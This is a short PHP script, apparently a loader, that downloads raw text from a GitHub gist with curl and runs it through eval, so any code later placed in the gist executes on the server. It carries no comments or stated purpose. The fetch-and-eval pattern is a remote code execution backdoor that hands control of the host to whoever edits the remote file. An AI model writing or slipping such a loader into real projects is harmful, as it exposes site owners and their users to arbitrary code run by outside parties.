<?php
    $Url = "https://gist.githubusercontent.com/Kyoukaaaa/4826ef11e59c78a29abc9da9ab9cf2c1/raw/e5982247da544d8a70c21b25bfc18e266946c87c/gistfile1.txt";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $Url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);
    echo eval('?>'.$output);

?>